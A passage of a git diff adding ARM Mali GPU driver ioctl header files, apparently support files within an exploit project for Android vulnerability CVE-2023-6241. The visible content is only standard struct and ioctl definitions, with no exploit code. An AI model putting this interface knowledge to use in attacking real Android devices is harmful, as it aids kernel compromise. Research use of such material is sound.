to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.csi_handlers: Flags to signal that the application intends to use CSI + * exception handlers in some linear buffers to deal with + * the given exception types. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 csi_handlers; + __u8 padding[2]; + /** + * @in.reserved: Reserved + */ + __u64 reserved; + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE \ + _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create) + +/** + * struct kbase_ioctl_cs_queue_group_term - Terminate a GPU command queue group + * + * @group_handle: Handle of the queue group to be terminated + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_cs_queue_group_term { + __u8 group_handle; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 43, struct kbase_ioctl_cs_queue_group_term) + +#define KBASE_IOCTL_CS_EVENT_SIGNAL \ + _IO(KBASE_IOCTL_TYPE, 44) + +typedef __u8 base_kcpu_queue_id; /* We support up to 256 active KCPU queues */ + +/** + * struct kbase_ioctl_kcpu_queue_new - Create a KCPU command queue + * + * @id: ID of the new command queue returned by the kernel + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_new { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_CREATE \ + _IOR(KBASE_IOCTL_TYPE, 45, struct kbase_ioctl_kcpu_queue_new) + +/** + * struct kbase_ioctl_kcpu_queue_delete - Destroy a KCPU command queue + * + * @id: ID of the command queue to be destroyed + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_delete { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_DELETE \ + _IOW(KBASE_IOCTL_TYPE, 46, struct kbase_ioctl_kcpu_queue_delete) + +/** + * struct kbase_ioctl_kcpu_queue_enqueue - Enqueue commands into the KCPU queue + * + * @addr: Memory address of an array of struct base_kcpu_queue_command + * @nr_commands: Number of commands in the array + * @id: kcpu queue identifier, returned by KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_enqueue { + __u64 addr; + __u32 nr_commands; + base_kcpu_queue_id id; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_ENQUEUE \ + _IOW(KBASE_IOCTL_TYPE, 47, struct kbase_ioctl_kcpu_queue_enqueue) + +/** + * union kbase_ioctl_cs_tiler_heap_init - Initialize chunked tiler memory heap + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @in.buf_desc_va: Buffer descriptor GPU VA for tiler heap reclaims. + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + __u64 buf_desc_va; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init) + +/** + * union kbase_ioctl_cs_tiler_heap_init_1_13 - Initialize chunked tiler memory heap, + * earlier version upto 1.13 + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init_1_13 { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT_1_13 \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init_1_13) + +/** + * struct kbase_ioctl_cs_tiler_heap_term - Terminate a chunked tiler heap + * instance + * + * @gpu_heap_va: GPU VA of Heap context that was set up for the heap. + */ +struct kbase_ioctl_cs_tiler_heap_term { + __u64 gpu_heap_va; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_TERM \ + _IOW(KBASE_IOCTL_TYPE, 49, struct kbase_ioctl_cs_tiler_heap_term) + +/** + * union kbase_ioctl_cs_get_glb_iface - Request the global control block + * of CSF interface capabilities + * + * @in: Input parameters + * @in.max_group_num: The maximum number of groups to be read. Can be 0, in + * which case groups_ptr is unused. + * @in.max_total_stream_num: The maximum number of CSs to be read. Can be 0, in + * which case streams_ptr is unused. + * @in.groups_ptr: Pointer where to store all the group data (sequentially). + * @in.streams_ptr: Pointer where to store all the CS data (sequentially). + * @out: Output parameters + * @out.glb_version: Global interface version. + * @out.features: Bit mask of features (e.g. whether certain types of job + * can be suspended). + * @out.group_num: Number of CSGs supported. + * @out.prfcnt_size: Size of CSF performance counters, in bytes. Bits 31:16 + * hold the size of firmware performance counter data + * and 15:0 hold the size of hardware performance counter + * data. + * @out.total_stream_num: Total number of CSs, summed across all groups. + * @out.instr_features: Instrumentation features. Bits 7:4 hold the maximum + * size of events. Bits 3:0 hold the offset update rate. + * (csf >= 1.1.0) + * + */ +union kbase_ioctl_cs_get_glb_iface { + struct { + __u32 max_group_num; + __u32 max_total_stream_num; + __u64 groups_ptr; + __u64 streams_ptr; + } in; + struct { + __u32 glb_version; + __u32 features; + __u32 group_num; + __u32 prfcnt_size; + __u32 total_stream_num; + __u32 instr_features; + } out; +}; + +#define KBASE_IOCTL_CS_GET_GLB_IFACE \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_ioctl_cs_get_glb_iface) + +struct kbase_ioctl_cs_cpu_queue_info { + __u64 buffer; + __u64 size; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_CS_CPU_QUEUE_DUMP \ + _IOW(KBASE_IOCTL_TYPE, 53, struct kbase_ioctl_cs_cpu_queue_info) + +/** + * union kbase_ioctl_mem_alloc_ex - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @in.fixed_address: The GPU virtual address requested for the allocation, + * if the allocation is using the BASE_MEM_FIXED flag. + * @in.extra: Space for extra parameters that may be added in the future. + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc_ex { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + __u64 fixed_address; + __u64 extra[3]; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC_EX _IOWR(KBASE_IOCTL_TYPE, 59, union kbase_ioctl_mem_alloc_ex) + +/** + * union kbase_ioctl_read_user_page - Read a register of USER page + * + * @in: Input parameters. + * @in.offset: Register offset in USER page. + * @in.padding: Padding to round up to a multiple of 8 bytes, must be zero. + * @out: Output parameters. + * @out.val_lo: Value of 32bit register or the 1st half of 64bit register to be read. + * @out.val_hi: Value of the 2nd half of 64bit register to be read. + */ +union kbase_ioctl_read_user_page { + struct { + __u32 offset; + __u32 padding; + } in; + struct { + __u32 val_lo; + __u32 val_hi; + } out; +}; + +#define KBASE_IOCTL_READ_USER_PAGE _IOWR(KBASE_IOCTL_TYPE, 60, union kbase_ioctl_read_user_page) + +#endif /* _UAPI_KBASE_CSF_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h new file mode 100644 index 0000000..9eaa83c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_ioctl.h @@ -0,0 +1,894 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2017-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_IOCTL_H_ +#define _UAPI_KBASE_IOCTL_H_ + +#ifdef __cpluscplus +extern "C" { +#endif + +#include +#include + +#include "mali_kbase_csf_ioctl.h" + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. + */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_cinstr_gwt_dump - Used to collect all GPU write fault + * addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + +/** + * struct kbase_ioctl_kinstr_prfcnt_enum_info - Enum Performance counter + * information + * @info_item_size: Performance counter item size in bytes. + * @info_item_count: Performance counter item count in the info_list_ptr. + * @info_list_ptr: Performance counter item list pointer which points to a + * list with info_item_count of items. + * + * On success: returns info_item_size and info_item_count if info_list_ptr is + * NULL, returns performance counter information if info_list_ptr is not NULL. + * On error: returns a negative error code. + */ +struct kbase_ioctl_kinstr_prfcnt_enum_info { + __u32 info_item_size; + __u32 info_item_count; + __u64 info_list_ptr; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO \ + _IOWR(KBASE_IOCTL_TYPE, 56, struct kbase_ioctl_kinstr_prfcnt_enum_info) + +/** + * struct kbase_ioctl_kinstr_prfcnt_setup - Setup HWC dumper/reader + * @in: input parameters. + * @in.request_item_count: Number of requests in the requests array. + * @in.request_item_size: Size in bytes of each request in the requests array. + * @in.requests_ptr: Pointer to the requests array. + * @out: output parameters. + * @out.prfcnt_metadata_item_size: Size of each item in the metadata array for + * each sample. + * @out.prfcnt_mmap_size_bytes: Size in bytes that user-space should mmap + * for reading performance counter samples. + * + * A fd is returned from the ioctl if successful, or a negative value on error. + */ +union kbase_ioctl_kinstr_prfcnt_setup { + struct { + __u32 request_item_count; + __u32 request_item_size; + __u64 requests_ptr; + } in; + struct { + __u32 prfcnt_metadata_item_size; + __u32 prfcnt_mmap_size_bytes; + } out; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_SETUP \ + _IOWR(KBASE_IOCTL_TYPE, 57, union kbase_ioctl_kinstr_prfcnt_setup) + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct 